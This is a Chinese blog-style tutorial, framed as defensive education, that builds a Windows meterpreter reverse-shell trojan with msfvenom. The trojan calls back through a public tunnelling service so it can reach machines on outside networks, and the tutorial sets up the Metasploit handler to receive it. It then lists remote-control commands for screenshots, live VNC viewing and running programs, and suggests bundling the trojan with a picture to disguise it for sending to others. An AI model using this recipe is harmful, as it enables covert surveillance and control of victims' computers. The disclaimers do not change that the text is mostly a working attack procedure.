（媽媽爲什麼我的電腦老被黑？？？）一個簡單的msf遠程滲透實驗（史上最細親媽教程）

網絡攻防如同打仗 知己知彼百戰不殆

要想學會防守必先知道敵人如何進攻

此教程的遠端測試全是我的好友幫助測試

並非實際攻擊！！！

寫一篇遠程的滲透教程給大家
當然不是爲了教大家去黑別人電腦
而是讓大家明白原理，懂得如何防範，再三強調！！！

使用此教程用在不正當地方造成的後果與本人無關！！！

接下來開始本次教程
先給大家展示一下效果吧！基於此程序可以監視對方電腦，實時屏幕抓取，甚至實時屏幕監測，還有創建賬戶，操控電腦等強悍功能。
（功能很多這裏就不過贅述了）

所以一般別人給你發的陌生程序千萬不要去點！！！！！！！
手機和電腦一個道理，今天就拿電腦端給大家進行講解，教程中如果出現錯誤，或者口誤的地方，希望大家可以幫我指明，我會積極改正，謝謝大家！！！

不廢話了，開始
這個就是通過screenshot命令進行遠端屏幕截取的（當時是我的一個朋友幫我進行的遠端測試，這是當時他的實時屏幕）

當然還有很多更強悍的命令，在後面再爲大家一一介紹。

**首先介紹需要的的工具！！！

（這裏就默認大家都有Linux了）

1.MSF本篇文章的重點工具
.

2.Sunny-Ngrok

（內網穿透工具，因爲做好的程序需要對方進行回連，而對方又處在外網，所以想要訪問你的主機，必須通過內網穿透纔可以連接到你的主機，被你監測和控制）

3.win7虛擬機

（這裏用作測試用，你可以在自己的物理機裏面測試）

一：內網穿透的註冊和隧道的使用

第一步打開Sunny官網，超級鏈接已部署，直接點就可以。然後果斷點擊註冊。

因爲我已經註冊過了這裏就不給大家演示了，不會註冊就直接放棄吧，百度估計也救不了你了。

接下來直接點擊隧道管理，然後點擊開通隧道，作爲白嫖黨，當然不會讓你們花錢的，直接拖到最下面

發現有個0元的，我的天這年頭還有免費的，立即購買直接點下去，然後點擊確認。

協議我們選擇tcp，隧道名字自己隨便取一個，遠程端口在10000-11000之間選擇，如果被用了的話，旁邊有個查看可用端口，點擊一下然後隨便選取一個就可以。

接下來還有一個 本地端口，這裏就是你虛擬機的端口，我這裏是kali ，所以我看一下我kali的本地ip地址，在kali終端中輸入 ifconfig 然後看一下你的ip地址如下圖。

然後端口的話，我這裏選擇的是22端口，所以我填完後信息如下。大家模仿即可。因爲我註冊過一次，所以這些信息是我的端口的信息，就不再註冊了。

接下來我們爲kali下載Sunny的啓動端，點擊即可。自己下載所對應的版本，因爲我的是64位的Linux，所以我之間下載64位的。

wget http://hls.ctopus.com/sunny/linux_amd64.zip?v=2

64位的Linux直接在終端輸入以上代碼即可下載。下載完後的壓縮包在你的主目錄中，點開即可看見。

下載下的文件名字可能會不一樣你們自己找一找，然後對文件進行解壓縮，將文件就解壓縮進主目錄即可。

右鍵文件夾，提取到此次即可，然後會多出來一個跟壓縮包名字一樣的文件夾，然後點開進去將裏面的Sunny文件移到最外層的目錄。

然後返回你剛剛註冊的那個網站，登錄上去，然後找見隧道管理，點擊然後找見你的id,還有端口，將它們記下來。我這裏的端口就是後面的10030.

然後在一個新的終端中，輸入以下命令。

./sunny clientid bbbbdwadawd（這個是你剛剛通道的id）

出現這個界面證明你的內網穿透服務正常啓動了，到此內網滲透的大部分工作完成了，接下來我們製作遠程木馬。

二.利用MSF製作遠程木馬

這步相對教爲簡單，大家按命令輸入即可。
新開一個終端窗口

msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp  LHOST=free.idcfengye.com LPORT=10030 -f exe -o 木馬名稱.exe

這裏的LHOST=後面的值不需要改，
LPORT=後面的值改爲剛剛註冊網頁的隧道端口（就是第一個提示在10000-11000之間選擇的那個端口）
木馬名稱自己寫一個就好。

出現如下提示證明你的木馬生成成功了，就在你的主目錄下面。

這個就是我生成的木馬，到這裏木馬就製作完成了，然後接下將這個木馬移到我們測試的主機中，我這裏是用win7測試的，所以以win7爲例。

三.利用MSF和win7測碼

至於如何將文件從Linux中移出來，且移到其它地方，這裏就不再贅述了，本白這裏用的是 Vm Tools ，當然方法有很多，個人認爲這個比較無腦點，哈哈哈。

我把文件名字改成了成品，看的舒服點 ，哈哈哈。

然後切回到我們的linx界面
在終端中挨個輸入如下命令

msfconsole

use exploit/multi/handler  

set payload windows/x64/meterpreter/reverse_tcp  

set lhost 192.168.187.131  //這個就是你剛剛網站的填寫的IP

set lport 22  //這個就是剛剛IP後面跟着的端口

exploit

以上命令請一條一條運行 ！！！

運行完這些命令後你會出現如下界面

然後返回我們的win7，運行剛剛的木馬程序。

出現這個界面證明對方上線了，此時你就可以進行操控了。

execute -f calc.exe

打開對方電腦的計算器。

這邊提示創建成功，打開我們的win7看一下。

果不其然，win7的計算器自己開啓了，然而這條命令只是冰山一角，命令還有好多，這裏就不給大家測了，給大家寫幾條常用的吧。

sysinfe   //  查看對面電腦配置

screenshot  //屏幕截圖   截取對方電腦的屏幕
  
run vnc  //實時監控對面屏幕

execute -f calc.exe //開計算器

因爲這只是教大家原理和簡單的方法，好多命令這裏就不給大家說了，大家可以自行百度什麼的。這個木馬因爲有了內網穿透是可以進行遠端執行的。

當然這個木馬，檢測是肯定過不了的，不要想着怎麼去坑害別人，
一定要堅守正義！！！！
一定要堅守正義！！！！
一定要堅守正義！！！！

至於如何過檢測軟件，大家就自己去摸索吧，這裏不教給大家了，如果是爲了給朋友發去，然後裝X的話，你可以和一個圖片什麼的捆綁起來，看起來 就 有內味了，這裏簡單捆綁了一下，給大家看下效果。

點擊軟件後會出現上面的圖片，閃一下，當然這需要提前將照片打包成 .exe 的格式的文件。好了好了 就寫這麼多了。

~
~
一個對網安瘋狂熱愛的小白的學習經驗

希望能夠讓想學習網安的人提起一些興趣

如果文章中有錯誤，或者不妥的地方請直接在評論中指明，本白會積極修改，還有就是想找個大佬帶帶我 畢竟一個學還是畢竟難的
~
~

如果你學到了一些東西請幫忙點個贊
真的很重要
謝謝大家